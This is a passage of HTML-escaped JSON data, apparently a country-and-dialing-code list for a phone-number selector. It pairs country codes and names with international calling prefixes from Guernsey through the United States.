(+502)&quot;},{&quot;$id&quot;:&quot;GG&quot;,&quot;$dialCode&quot;:&quot;44&quot;,&quot;$name&quot;:&quot;Guernsey&quot;,&quot;$elt&quot;:&quot;Guernsey (+44)&quot;},{&quot;$id&quot;:&quot;GN&quot;,&quot;$dialCode&quot;:&quot;224&quot;,&quot;$name&quot;:&quot;Guinea&quot;,&quot;$elt&quot;:&quot;Guinea (+224)&quot;},{&quot;$id&quot;:&quot;GW&quot;,&quot;$dialCode&quot;:&quot;245&quot;,&quot;$name&quot;:&quot;Guinea-Bissau&quot;,&quot;$elt&quot;:&quot;Guinea-Bissau (+245)&quot;},{&quot;$id&quot;:&quot;GY&quot;,&quot;$dialCode&quot;:&quot;592&quot;,&quot;$name&quot;:&quot;Guyana&quot;,&quot;$elt&quot;:&quot;Guyana (+592)&quot;},{&quot;$id&quot;:&quot;HT&quot;,&quot;$dialCode&quot;:&quot;509&quot;,&quot;$name&quot;:&quot;Haiti&quot;,&quot;$elt&quot;:&quot;Haiti (+509)&quot;},{&quot;$id&quot;:&quot;HN&quot;,&quot;$dialCode&quot;:&quot;504&quot;,&quot;$name&quot;:&quot;Honduras&quot;,&quot;$elt&quot;:&quot;Honduras (+504)&quot;},{&quot;$id&quot;:&quot;HK&quot;,&quot;$dialCode&quot;:&quot;852&quot;,&quot;$name&quot;:&quot;Hong Kong SAR China&quot;,&quot;$elt&quot;:&quot;Hong Kong SAR China (+852)&quot;},{&quot;$id&quot;:&quot;HU&quot;,&quot;$dialCode&quot;:&quot;36&quot;,&quot;$name&quot;:&quot;Hungary&quot;,&quot;$elt&quot;:&quot;Hungary (+36)&quot;},{&quot;$id&quot;:&quot;IS&quot;,&quot;$dialCode&quot;:&quot;354&quot;,&quot;$name&quot;:&quot;Iceland&quot;,&quot;$elt&quot;:&quot;Iceland (+354)&quot;},{&quot;$id&quot;:&quot;IN&quot;,&quot;$dialCode&quot;:&quot;91&quot;,&quot;$name&quot;:&quot;India&quot;,&quot;$elt&quot;:&quot;India (+91)&quot;},{&quot;$id&quot;:&quot;ID&quot;,&quot;$dialCode&quot;:&quot;62&quot;,&quot;$name&quot;:&quot;Indonesia&quot;,&quot;$elt&quot;:&quot;Indonesia (+62)&quot;},{&quot;$id&quot;:&quot;IR&quot;,&quot;$dialCode&quot;:&quot;98&quot;,&quot;$name&quot;:&quot;Iran&quot;,&quot;$elt&quot;:&quot;Iran (+98)&quot;},{&quot;$id&quot;:&quot;IQ&quot;,&quot;$dialCode&quot;:&quot;964&quot;,&quot;$name&quot;:&quot;Iraq&quot;,&quot;$elt&quot;:&quot;Iraq (+964)&quot;},{&quot;$id&quot;:&quot;IE&quot;,&quot;$dialCode&quot;:&quot;353&quot;,&quot;$name&quot;:&quot;Ireland&quot;,&quot;$elt&quot;:&quot;Ireland (+353)&quot;},{&quot;$id&quot;:&quot;IM&quot;,&quot;$dialCode&quot;:&quot;44&quot;,&quot;$name&quot;:&quot;Isle of Man&quot;,&quot;$elt&quot;:&quot;Isle of Man (+44)&quot;},{&quot;$id&quot;:&quot;IL&quot;,&quot;$dialCode&quot;:&quot;972&quot;,&quot;$name&quot;:&quot;Israel&quot;,&quot;$elt&quot;:&quot;Israel (+972)&quot;},{&quot;$id&quot;:&quot;IT&quot;,&quot;$dialCode&quot;:&quot;39&quot;,&quot;$name&quot;:&quot;Italy&quot;,&quot;$elt&quot;:&quot;Italy (+39)&quot;},{&quot;$id&quot;:&quot;JM&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Jamaica&quot;,&quot;$elt&quot;:&quot;Jamaica (+1876)&quot;},{&quot;$id&quot;:&quot;JP&quot;,&quot;$dialCode&quot;:&quot;81&quot;,&quot;$name&quot;:&quot;Japan&quot;,&quot;$elt&quot;:&quot;Japan (+81)&quot;},{&quot;$id&quot;:&quot;JE&quot;,&quot;$dialCode&quot;:&quot;44&quot;,&quot;$name&quot;:&quot;Jersey&quot;,&quot;$elt&quot;:&quot;Jersey (+44)&quot;},{&quot;$id&quot;:&quot;JO&quot;,&quot;$dialCode&quot;:&quot;962&quot;,&quot;$name&quot;:&quot;Jordan&quot;,&quot;$elt&quot;:&quot;Jordan (+962)&quot;},{&quot;$id&quot;:&quot;KZ&quot;,&quot;$dialCode&quot;:&quot;7&quot;,&quot;$name&quot;:&quot;Kazakhstan&quot;,&quot;$elt&quot;:&quot;Kazakhstan (+7)&quot;},{&quot;$id&quot;:&quot;KE&quot;,&quot;$dialCode&quot;:&quot;254&quot;,&quot;$name&quot;:&quot;Kenya&quot;,&quot;$elt&quot;:&quot;Kenya (+254)&quot;},{&quot;$id&quot;:&quot;KI&quot;,&quot;$dialCode&quot;:&quot;686&quot;,&quot;$name&quot;:&quot;Kiribati&quot;,&quot;$elt&quot;:&quot;Kiribati (+686)&quot;},{&quot;$id&quot;:&quot;XK&quot;,&quot;$dialCode&quot;:&quot;383&quot;,&quot;$name&quot;:&quot;Kosovo&quot;,&quot;$elt&quot;:&quot;Kosovo (+383)&quot;},{&quot;$id&quot;:&quot;KW&quot;,&quot;$dialCode&quot;:&quot;965&quot;,&quot;$name&quot;:&quot;Kuwait&quot;,&quot;$elt&quot;:&quot;Kuwait (+965)&quot;},{&quot;$id&quot;:&quot;KG&quot;,&quot;$dialCode&quot;:&quot;996&quot;,&quot;$name&quot;:&quot;Kyrgyzstan&quot;,&quot;$elt&quot;:&quot;Kyrgyzstan (+996)&quot;},{&quot;$id&quot;:&quot;LA&quot;,&quot;$dialCode&quot;:&quot;856&quot;,&quot;$name&quot;:&quot;Laos&quot;,&quot;$elt&quot;:&quot;Laos (+856)&quot;},{&quot;$id&quot;:&quot;LV&quot;,&quot;$dialCode&quot;:&quot;371&quot;,&quot;$name&quot;:&quot;Latvia&quot;,&quot;$elt&quot;:&quot;Latvia (+371)&quot;},{&quot;$id&quot;:&quot;LB&quot;,&quot;$dialCode&quot;:&quot;961&quot;,&quot;$name&quot;:&quot;Lebanon&quot;,&quot;$elt&quot;:&quot;Lebanon (+961)&quot;},{&quot;$id&quot;:&quot;LS&quot;,&quot;$dialCode&quot;:&quot;266&quot;,&quot;$name&quot;:&quot;Lesotho&quot;,&quot;$elt&quot;:&quot;Lesotho (+266)&quot;},{&quot;$id&quot;:&quot;LR&quot;,&quot;$dialCode&quot;:&quot;231&quot;,&quot;$name&quot;:&quot;Liberia&quot;,&quot;$elt&quot;:&quot;Liberia (+231)&quot;},{&quot;$id&quot;:&quot;LY&quot;,&quot;$dialCode&quot;:&quot;218&quot;,&quot;$name&quot;:&quot;Libya&quot;,&quot;$elt&quot;:&quot;Libya (+218)&quot;},{&quot;$id&quot;:&quot;LI&quot;,&quot;$dialCode&quot;:&quot;423&quot;,&quot;$name&quot;:&quot;Liechtenstein&quot;,&quot;$elt&quot;:&quot;Liechtenstein (+423)&quot;},{&quot;$id&quot;:&quot;LT&quot;,&quot;$dialCode&quot;:&quot;370&quot;,&quot;$name&quot;:&quot;Lithuania&quot;,&quot;$elt&quot;:&quot;Lithuania (+370)&quot;},{&quot;$id&quot;:&quot;LU&quot;,&quot;$dialCode&quot;:&quot;352&quot;,&quot;$name&quot;:&quot;Luxembourg&quot;,&quot;$elt&quot;:&quot;Luxembourg (+352)&quot;},{&quot;$id&quot;:&quot;MO&quot;,&quot;$dialCode&quot;:&quot;853&quot;,&quot;$name&quot;:&quot;Macau SAR China&quot;,&quot;$elt&quot;:&quot;Macau SAR China (+853)&quot;},{&quot;$id&quot;:&quot;MK&quot;,&quot;$dialCode&quot;:&quot;389&quot;,&quot;$name&quot;:&quot;Macedonia&quot;,&quot;$elt&quot;:&quot;Macedonia (+389)&quot;},{&quot;$id&quot;:&quot;MG&quot;,&quot;$dialCode&quot;:&quot;261&quot;,&quot;$name&quot;:&quot;Madagascar&quot;,&quot;$elt&quot;:&quot;Madagascar (+261)&quot;},{&quot;$id&quot;:&quot;MW&quot;,&quot;$dialCode&quot;:&quot;265&quot;,&quot;$name&quot;:&quot;Malawi&quot;,&quot;$elt&quot;:&quot;Malawi (+265)&quot;},{&quot;$id&quot;:&quot;MY&quot;,&quot;$dialCode&quot;:&quot;60&quot;,&quot;$name&quot;:&quot;Malaysia&quot;,&quot;$elt&quot;:&quot;Malaysia (+60)&quot;},{&quot;$id&quot;:&quot;MV&quot;,&quot;$dialCode&quot;:&quot;960&quot;,&quot;$name&quot;:&quot;Maldives&quot;,&quot;$elt&quot;:&quot;Maldives (+960)&quot;},{&quot;$id&quot;:&quot;ML&quot;,&quot;$dialCode&quot;:&quot;223&quot;,&quot;$name&quot;:&quot;Mali&quot;,&quot;$elt&quot;:&quot;Mali (+223)&quot;},{&quot;$id&quot;:&quot;MT&quot;,&quot;$dialCode&quot;:&quot;356&quot;,&quot;$name&quot;:&quot;Malta&quot;,&quot;$elt&quot;:&quot;Malta (+356)&quot;},{&quot;$id&quot;:&quot;MH&quot;,&quot;$dialCode&quot;:&quot;692&quot;,&quot;$name&quot;:&quot;Marshall Islands&quot;,&quot;$elt&quot;:&quot;Marshall Islands (+692)&quot;},{&quot;$id&quot;:&quot;MQ&quot;,&quot;$dialCode&quot;:&quot;596&quot;,&quot;$name&quot;:&quot;Martinique&quot;,&quot;$elt&quot;:&quot;Martinique (+596)&quot;},{&quot;$id&quot;:&quot;MR&quot;,&quot;$dialCode&quot;:&quot;222&quot;,&quot;$name&quot;:&quot;Mauritania&quot;,&quot;$elt&quot;:&quot;Mauritania (+222)&quot;},{&quot;$id&quot;:&quot;MU&quot;,&quot;$dialCode&quot;:&quot;230&quot;,&quot;$name&quot;:&quot;Mauritius&quot;,&quot;$elt&quot;:&quot;Mauritius (+230)&quot;},{&quot;$id&quot;:&quot;YT&quot;,&quot;$dialCode&quot;:&quot;262&quot;,&quot;$name&quot;:&quot;Mayotte&quot;,&quot;$elt&quot;:&quot;Mayotte (+262)&quot;},{&quot;$id&quot;:&quot;MX&quot;,&quot;$dialCode&quot;:&quot;52&quot;,&quot;$name&quot;:&quot;Mexico&quot;,&quot;$elt&quot;:&quot;Mexico (+52)&quot;},{&quot;$id&quot;:&quot;FM&quot;,&quot;$dialCode&quot;:&quot;691&quot;,&quot;$name&quot;:&quot;Micronesia&quot;,&quot;$elt&quot;:&quot;Micronesia (+691)&quot;},{&quot;$id&quot;:&quot;MD&quot;,&quot;$dialCode&quot;:&quot;373&quot;,&quot;$name&quot;:&quot;Moldova&quot;,&quot;$elt&quot;:&quot;Moldova (+373)&quot;},{&quot;$id&quot;:&quot;MC&quot;,&quot;$dialCode&quot;:&quot;377&quot;,&quot;$name&quot;:&quot;Monaco&quot;,&quot;$elt&quot;:&quot;Monaco (+377)&quot;},{&quot;$id&quot;:&quot;MN&quot;,&quot;$dialCode&quot;:&quot;976&quot;,&quot;$name&quot;:&quot;Mongolia&quot;,&quot;$elt&quot;:&quot;Mongolia (+976)&quot;},{&quot;$id&quot;:&quot;ME&quot;,&quot;$dialCode&quot;:&quot;382&quot;,&quot;$name&quot;:&quot;Montenegro&quot;,&quot;$elt&quot;:&quot;Montenegro (+382)&quot;},{&quot;$id&quot;:&quot;MS&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Montserrat&quot;,&quot;$elt&quot;:&quot;Montserrat (+1664)&quot;},{&quot;$id&quot;:&quot;MA&quot;,&quot;$dialCode&quot;:&quot;212&quot;,&quot;$name&quot;:&quot;Morocco&quot;,&quot;$elt&quot;:&quot;Morocco (+212)&quot;},{&quot;$id&quot;:&quot;MZ&quot;,&quot;$dialCode&quot;:&quot;258&quot;,&quot;$name&quot;:&quot;Mozambique&quot;,&quot;$elt&quot;:&quot;Mozambique (+258)&quot;},{&quot;$id&quot;:&quot;MM&quot;,&quot;$dialCode&quot;:&quot;95&quot;,&quot;$name&quot;:&quot;Myanmar (Burma)&quot;,&quot;$elt&quot;:&quot;Myanmar (Burma) (+95)&quot;},{&quot;$id&quot;:&quot;NA&quot;,&quot;$dialCode&quot;:&quot;264&quot;,&quot;$name&quot;:&quot;Namibia&quot;,&quot;$elt&quot;:&quot;Namibia (+264)&quot;},{&quot;$id&quot;:&quot;NR&quot;,&quot;$dialCode&quot;:&quot;674&quot;,&quot;$name&quot;:&quot;Nauru&quot;,&quot;$elt&quot;:&quot;Nauru (+674)&quot;},{&quot;$id&quot;:&quot;NP&quot;,&quot;$dialCode&quot;:&quot;977&quot;,&quot;$name&quot;:&quot;Nepal&quot;,&quot;$elt&quot;:&quot;Nepal (+977)&quot;},{&quot;$id&quot;:&quot;NL&quot;,&quot;$dialCode&quot;:&quot;31&quot;,&quot;$name&quot;:&quot;Netherlands&quot;,&quot;$elt&quot;:&quot;Netherlands (+31)&quot;},{&quot;$id&quot;:&quot;AN&quot;,&quot;$dialCode&quot;:&quot;599&quot;,&quot;$name&quot;:&quot;Netherlands Antilles&quot;,&quot;$elt&quot;:&quot;Netherlands Antilles (+599)&quot;},{&quot;$id&quot;:&quot;NC&quot;,&quot;$dialCode&quot;:&quot;687&quot;,&quot;$name&quot;:&quot;New Caledonia&quot;,&quot;$elt&quot;:&quot;New Caledonia (+687)&quot;},{&quot;$id&quot;:&quot;NZ&quot;,&quot;$dialCode&quot;:&quot;64&quot;,&quot;$name&quot;:&quot;New Zealand&quot;,&quot;$elt&quot;:&quot;New Zealand (+64)&quot;},{&quot;$id&quot;:&quot;NI&quot;,&quot;$dialCode&quot;:&quot;505&quot;,&quot;$name&quot;:&quot;Nicaragua&quot;,&quot;$elt&quot;:&quot;Nicaragua (+505)&quot;},{&quot;$id&quot;:&quot;NE&quot;,&quot;$dialCode&quot;:&quot;227&quot;,&quot;$name&quot;:&quot;Niger&quot;,&quot;$elt&quot;:&quot;Niger (+227)&quot;},{&quot;$id&quot;:&quot;NG&quot;,&quot;$dialCode&quot;:&quot;234&quot;,&quot;$name&quot;:&quot;Nigeria&quot;,&quot;$elt&quot;:&quot;Nigeria (+234)&quot;},{&quot;$id&quot;:&quot;NU&quot;,&quot;$dialCode&quot;:&quot;683&quot;,&quot;$name&quot;:&quot;Niue&quot;,&quot;$elt&quot;:&quot;Niue (+683)&quot;},{&quot;$id&quot;:&quot;NF&quot;,&quot;$dialCode&quot;:&quot;672&quot;,&quot;$name&quot;:&quot;Norfolk Island&quot;,&quot;$elt&quot;:&quot;Norfolk Island (+672)&quot;},{&quot;$id&quot;:&quot;KP&quot;,&quot;$dialCode&quot;:&quot;850&quot;,&quot;$name&quot;:&quot;North Korea&quot;,&quot;$elt&quot;:&quot;North Korea (+850)&quot;},{&quot;$id&quot;:&quot;MP&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Northern Mariana Islands&quot;,&quot;$elt&quot;:&quot;Northern Mariana Islands (+1670)&quot;},{&quot;$id&quot;:&quot;NO&quot;,&quot;$dialCode&quot;:&quot;47&quot;,&quot;$name&quot;:&quot;Norway&quot;,&quot;$elt&quot;:&quot;Norway (+47)&quot;},{&quot;$id&quot;:&quot;OM&quot;,&quot;$dialCode&quot;:&quot;968&quot;,&quot;$name&quot;:&quot;Oman&quot;,&quot;$elt&quot;:&quot;Oman (+968)&quot;},{&quot;$id&quot;:&quot;PK&quot;,&quot;$dialCode&quot;:&quot;92&quot;,&quot;$name&quot;:&quot;Pakistan&quot;,&quot;$elt&quot;:&quot;Pakistan (+92)&quot;},{&quot;$id&quot;:&quot;PW&quot;,&quot;$dialCode&quot;:&quot;680&quot;,&quot;$name&quot;:&quot;Palau&quot;,&quot;$elt&quot;:&quot;Palau (+680)&quot;},{&quot;$id&quot;:&quot;PS&quot;,&quot;$dialCode&quot;:&quot;970&quot;,&quot;$name&quot;:&quot;Palestinian Territories&quot;,&quot;$elt&quot;:&quot;Palestinian Territories (+970)&quot;},{&quot;$id&quot;:&quot;PA&quot;,&quot;$dialCode&quot;:&quot;507&quot;,&quot;$name&quot;:&quot;Panama&quot;,&quot;$elt&quot;:&quot;Panama (+507)&quot;},{&quot;$id&quot;:&quot;PG&quot;,&quot;$dialCode&quot;:&quot;675&quot;,&quot;$name&quot;:&quot;Papua New Guinea&quot;,&quot;$elt&quot;:&quot;Papua New Guinea (+675)&quot;},{&quot;$id&quot;:&quot;PY&quot;,&quot;$dialCode&quot;:&quot;595&quot;,&quot;$name&quot;:&quot;Paraguay&quot;,&quot;$elt&quot;:&quot;Paraguay (+595)&quot;},{&quot;$id&quot;:&quot;PE&quot;,&quot;$dialCode&quot;:&quot;51&quot;,&quot;$name&quot;:&quot;Peru&quot;,&quot;$elt&quot;:&quot;Peru (+51)&quot;},{&quot;$id&quot;:&quot;PH&quot;,&quot;$dialCode&quot;:&quot;63&quot;,&quot;$name&quot;:&quot;Philippines&quot;,&quot;$elt&quot;:&quot;Philippines (+63)&quot;},{&quot;$id&quot;:&quot;PN&quot;,&quot;$dialCode&quot;:&quot;870&quot;,&quot;$name&quot;:&quot;Pitcairn Islands&quot;,&quot;$elt&quot;:&quot;Pitcairn Islands (+870)&quot;},{&quot;$id&quot;:&quot;PL&quot;,&quot;$dialCode&quot;:&quot;48&quot;,&quot;$name&quot;:&quot;Poland&quot;,&quot;$elt&quot;:&quot;Poland (+48)&quot;},{&quot;$id&quot;:&quot;PT&quot;,&quot;$dialCode&quot;:&quot;351&quot;,&quot;$name&quot;:&quot;Portugal&quot;,&quot;$elt&quot;:&quot;Portugal (+351)&quot;},{&quot;$id&quot;:&quot;PR&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Puerto Rico&quot;,&quot;$elt&quot;:&quot;Puerto Rico (+1)&quot;},{&quot;$id&quot;:&quot;QA&quot;,&quot;$dialCode&quot;:&quot;974&quot;,&quot;$name&quot;:&quot;Qatar&quot;,&quot;$elt&quot;:&quot;Qatar (+974)&quot;},{&quot;$id&quot;:&quot;RE&quot;,&quot;$dialCode&quot;:&quot;262&quot;,&quot;$name&quot;:&quot;Réunion&quot;,&quot;$elt&quot;:&quot;Réunion (+262)&quot;},{&quot;$id&quot;:&quot;RO&quot;,&quot;$dialCode&quot;:&quot;40&quot;,&quot;$name&quot;:&quot;Romania&quot;,&quot;$elt&quot;:&quot;Romania (+40)&quot;},{&quot;$id&quot;:&quot;RU&quot;,&quot;$dialCode&quot;:&quot;7&quot;,&quot;$name&quot;:&quot;Russia&quot;,&quot;$elt&quot;:&quot;Russia (+7)&quot;},{&quot;$id&quot;:&quot;RW&quot;,&quot;$dialCode&quot;:&quot;250&quot;,&quot;$name&quot;:&quot;Rwanda&quot;,&quot;$elt&quot;:&quot;Rwanda (+250)&quot;},{&quot;$id&quot;:&quot;WS&quot;,&quot;$dialCode&quot;:&quot;685&quot;,&quot;$name&quot;:&quot;Samoa&quot;,&quot;$elt&quot;:&quot;Samoa (+685)&quot;},{&quot;$id&quot;:&quot;SM&quot;,&quot;$dialCode&quot;:&quot;378&quot;,&quot;$name&quot;:&quot;San Marino&quot;,&quot;$elt&quot;:&quot;San Marino (+378)&quot;},{&quot;$id&quot;:&quot;ST&quot;,&quot;$dialCode&quot;:&quot;239&quot;,&quot;$name&quot;:&quot;São Tomé &amp; Príncipe&quot;,&quot;$elt&quot;:&quot;São Tomé &amp; Príncipe (+239)&quot;},{&quot;$id&quot;:&quot;SA&quot;,&quot;$dialCode&quot;:&quot;966&quot;,&quot;$name&quot;:&quot;Saudi Arabia&quot;,&quot;$elt&quot;:&quot;Saudi Arabia (+966)&quot;},{&quot;$id&quot;:&quot;SN&quot;,&quot;$dialCode&quot;:&quot;221&quot;,&quot;$name&quot;:&quot;Senegal&quot;,&quot;$elt&quot;:&quot;Senegal (+221)&quot;},{&quot;$id&quot;:&quot;RS&quot;,&quot;$dialCode&quot;:&quot;381&quot;,&quot;$name&quot;:&quot;Serbia&quot;,&quot;$elt&quot;:&quot;Serbia (+381)&quot;},{&quot;$id&quot;:&quot;SC&quot;,&quot;$dialCode&quot;:&quot;248&quot;,&quot;$name&quot;:&quot;Seychelles&quot;,&quot;$elt&quot;:&quot;Seychelles (+248)&quot;},{&quot;$id&quot;:&quot;SL&quot;,&quot;$dialCode&quot;:&quot;232&quot;,&quot;$name&quot;:&quot;Sierra Leone&quot;,&quot;$elt&quot;:&quot;Sierra Leone (+232)&quot;},{&quot;$id&quot;:&quot;SG&quot;,&quot;$dialCode&quot;:&quot;65&quot;,&quot;$name&quot;:&quot;Singapore&quot;,&quot;$elt&quot;:&quot;Singapore (+65)&quot;},{&quot;$id&quot;:&quot;SX&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Sint Maarten&quot;,&quot;$elt&quot;:&quot;Sint Maarten (+1)&quot;},{&quot;$id&quot;:&quot;SK&quot;,&quot;$dialCode&quot;:&quot;421&quot;,&quot;$name&quot;:&quot;Slovakia&quot;,&quot;$elt&quot;:&quot;Slovakia (+421)&quot;},{&quot;$id&quot;:&quot;SI&quot;,&quot;$dialCode&quot;:&quot;386&quot;,&quot;$name&quot;:&quot;Slovenia&quot;,&quot;$elt&quot;:&quot;Slovenia (+386)&quot;},{&quot;$id&quot;:&quot;SB&quot;,&quot;$dialCode&quot;:&quot;677&quot;,&quot;$name&quot;:&quot;Solomon Islands&quot;,&quot;$elt&quot;:&quot;Solomon Islands (+677)&quot;},{&quot;$id&quot;:&quot;SO&quot;,&quot;$dialCode&quot;:&quot;252&quot;,&quot;$name&quot;:&quot;Somalia&quot;,&quot;$elt&quot;:&quot;Somalia (+252)&quot;},{&quot;$id&quot;:&quot;ZA&quot;,&quot;$dialCode&quot;:&quot;27&quot;,&quot;$name&quot;:&quot;South Africa&quot;,&quot;$elt&quot;:&quot;South Africa (+27)&quot;},{&quot;$id&quot;:&quot;KR&quot;,&quot;$dialCode&quot;:&quot;82&quot;,&quot;$name&quot;:&quot;South Korea&quot;,&quot;$elt&quot;:&quot;South Korea (+82)&quot;},{&quot;$id&quot;:&quot;SS&quot;,&quot;$dialCode&quot;:&quot;211&quot;,&quot;$name&quot;:&quot;South Sudan&quot;,&quot;$elt&quot;:&quot;South Sudan (+211)&quot;},{&quot;$id&quot;:&quot;ES&quot;,&quot;$dialCode&quot;:&quot;34&quot;,&quot;$name&quot;:&quot;Spain&quot;,&quot;$elt&quot;:&quot;Spain (+34)&quot;},{&quot;$id&quot;:&quot;LK&quot;,&quot;$dialCode&quot;:&quot;94&quot;,&quot;$name&quot;:&quot;Sri Lanka&quot;,&quot;$elt&quot;:&quot;Sri Lanka (+94)&quot;},{&quot;$id&quot;:&quot;BL&quot;,&quot;$dialCode&quot;:&quot;590&quot;,&quot;$name&quot;:&quot;St. Barthélemy&quot;,&quot;$elt&quot;:&quot;St. Barthélemy (+590)&quot;},{&quot;$id&quot;:&quot;SH&quot;,&quot;$dialCode&quot;:&quot;290&quot;,&quot;$name&quot;:&quot;St. Helena&quot;,&quot;$elt&quot;:&quot;St. Helena (+290)&quot;},{&quot;$id&quot;:&quot;KN&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;St. Kitts &amp; Nevis&quot;,&quot;$elt&quot;:&quot;St. Kitts &amp; Nevis (+1869)&quot;},{&quot;$id&quot;:&quot;LC&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;St. Lucia&quot;,&quot;$elt&quot;:&quot;St. Lucia (+1758)&quot;},{&quot;$id&quot;:&quot;MF&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;St. Martin&quot;,&quot;$elt&quot;:&quot;St. Martin (+1599)&quot;},{&quot;$id&quot;:&quot;PM&quot;,&quot;$dialCode&quot;:&quot;508&quot;,&quot;$name&quot;:&quot;St. Pierre &amp; Miquelon&quot;,&quot;$elt&quot;:&quot;St. Pierre &amp; Miquelon (+508)&quot;},{&quot;$id&quot;:&quot;VC&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;St. Vincent &amp; Grenadines&quot;,&quot;$elt&quot;:&quot;St. Vincent &amp; Grenadines (+1784)&quot;},{&quot;$id&quot;:&quot;SD&quot;,&quot;$dialCode&quot;:&quot;249&quot;,&quot;$name&quot;:&quot;Sudan&quot;,&quot;$elt&quot;:&quot;Sudan (+249)&quot;},{&quot;$id&quot;:&quot;SR&quot;,&quot;$dialCode&quot;:&quot;597&quot;,&quot;$name&quot;:&quot;Suriname&quot;,&quot;$elt&quot;:&quot;Suriname (+597)&quot;},{&quot;$id&quot;:&quot;SJ&quot;,&quot;$dialCode&quot;:&quot;47&quot;,&quot;$name&quot;:&quot;Svalbard &amp; Jan Mayen&quot;,&quot;$elt&quot;:&quot;Svalbard &amp; Jan Mayen (+47)&quot;},{&quot;$id&quot;:&quot;SZ&quot;,&quot;$dialCode&quot;:&quot;268&quot;,&quot;$name&quot;:&quot;Swaziland&quot;,&quot;$elt&quot;:&quot;Swaziland (+268)&quot;},{&quot;$id&quot;:&quot;SE&quot;,&quot;$dialCode&quot;:&quot;46&quot;,&quot;$name&quot;:&quot;Sweden&quot;,&quot;$elt&quot;:&quot;Sweden (+46)&quot;},{&quot;$id&quot;:&quot;CH&quot;,&quot;$dialCode&quot;:&quot;41&quot;,&quot;$name&quot;:&quot;Switzerland&quot;,&quot;$elt&quot;:&quot;Switzerland (+41)&quot;},{&quot;$id&quot;:&quot;SY&quot;,&quot;$dialCode&quot;:&quot;963&quot;,&quot;$name&quot;:&quot;Syria&quot;,&quot;$elt&quot;:&quot;Syria (+963)&quot;},{&quot;$id&quot;:&quot;TW&quot;,&quot;$dialCode&quot;:&quot;886&quot;,&quot;$name&quot;:&quot;Taiwan&quot;,&quot;$elt&quot;:&quot;Taiwan (+886)&quot;},{&quot;$id&quot;:&quot;TJ&quot;,&quot;$dialCode&quot;:&quot;992&quot;,&quot;$name&quot;:&quot;Tajikistan&quot;,&quot;$elt&quot;:&quot;Tajikistan (+992)&quot;},{&quot;$id&quot;:&quot;TZ&quot;,&quot;$dialCode&quot;:&quot;255&quot;,&quot;$name&quot;:&quot;Tanzania&quot;,&quot;$elt&quot;:&quot;Tanzania (+255)&quot;},{&quot;$id&quot;:&quot;TH&quot;,&quot;$dialCode&quot;:&quot;66&quot;,&quot;$name&quot;:&quot;Thailand&quot;,&quot;$elt&quot;:&quot;Thailand (+66)&quot;},{&quot;$id&quot;:&quot;TL&quot;,&quot;$dialCode&quot;:&quot;670&quot;,&quot;$name&quot;:&quot;Timor-Leste&quot;,&quot;$elt&quot;:&quot;Timor-Leste (+670)&quot;},{&quot;$id&quot;:&quot;TG&quot;,&quot;$dialCode&quot;:&quot;228&quot;,&quot;$name&quot;:&quot;Togo&quot;,&quot;$elt&quot;:&quot;Togo (+228)&quot;},{&quot;$id&quot;:&quot;TK&quot;,&quot;$dialCode&quot;:&quot;690&quot;,&quot;$name&quot;:&quot;Tokelau&quot;,&quot;$elt&quot;:&quot;Tokelau (+690)&quot;},{&quot;$id&quot;:&quot;TO&quot;,&quot;$dialCode&quot;:&quot;676&quot;,&quot;$name&quot;:&quot;Tonga&quot;,&quot;$elt&quot;:&quot;Tonga (+676)&quot;},{&quot;$id&quot;:&quot;TT&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Trinidad &amp; Tobago&quot;,&quot;$elt&quot;:&quot;Trinidad &amp; Tobago (+1868)&quot;},{&quot;$id&quot;:&quot;TN&quot;,&quot;$dialCode&quot;:&quot;216&quot;,&quot;$name&quot;:&quot;Tunisia&quot;,&quot;$elt&quot;:&quot;Tunisia (+216)&quot;},{&quot;$id&quot;:&quot;TR&quot;,&quot;$dialCode&quot;:&quot;90&quot;,&quot;$name&quot;:&quot;Turkey&quot;,&quot;$elt&quot;:&quot;Turkey (+90)&quot;},{&quot;$id&quot;:&quot;TM&quot;,&quot;$dialCode&quot;:&quot;993&quot;,&quot;$name&quot;:&quot;Turkmenistan&quot;,&quot;$elt&quot;:&quot;Turkmenistan (+993)&quot;},{&quot;$id&quot;:&quot;TC&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;Turks &amp; Caicos Islands&quot;,&quot;$elt&quot;:&quot;Turks &amp; Caicos Islands (+1649)&quot;},{&quot;$id&quot;:&quot;TV&quot;,&quot;$dialCode&quot;:&quot;688&quot;,&quot;$name&quot;:&quot;Tuvalu&quot;,&quot;$elt&quot;:&quot;Tuvalu (+688)&quot;},{&quot;$id&quot;:&quot;VI&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;U.S. Virgin Islands&quot;,&quot;$elt&quot;:&quot;U.S. Virgin Islands (+1340)&quot;},{&quot;$id&quot;:&quot;UG&quot;,&quot;$dialCode&quot;:&quot;256&quot;,&quot;$name&quot;:&quot;Uganda&quot;,&quot;$elt&quot;:&quot;Uganda (+256)&quot;},{&quot;$id&quot;:&quot;UA&quot;,&quot;$dialCode&quot;:&quot;380&quot;,&quot;$name&quot;:&quot;Ukraine&quot;,&quot;$elt&quot;:&quot;Ukraine (+380)&quot;},{&quot;$id&quot;:&quot;AE&quot;,&quot;$dialCode&quot;:&quot;971&quot;,&quot;$name&quot;:&quot;United Arab Emirates&quot;,&quot;$elt&quot;:&quot;United Arab Emirates (+971)&quot;},{&quot;$id&quot;:&quot;GB&quot;,&quot;$dialCode&quot;:&quot;44&quot;,&quot;$name&quot;:&quot;United Kingdom&quot;,&quot;$elt&quot;:&quot;United Kingdom (+44)&quot;},{&quot;$id&quot;:&quot;US&quot;,&quot;$dialCode&quot;:&quot;1&quot;,&quot;$name&quot;:&quot;United States&quot;,&quot;$elt&quot;:&quot;United States 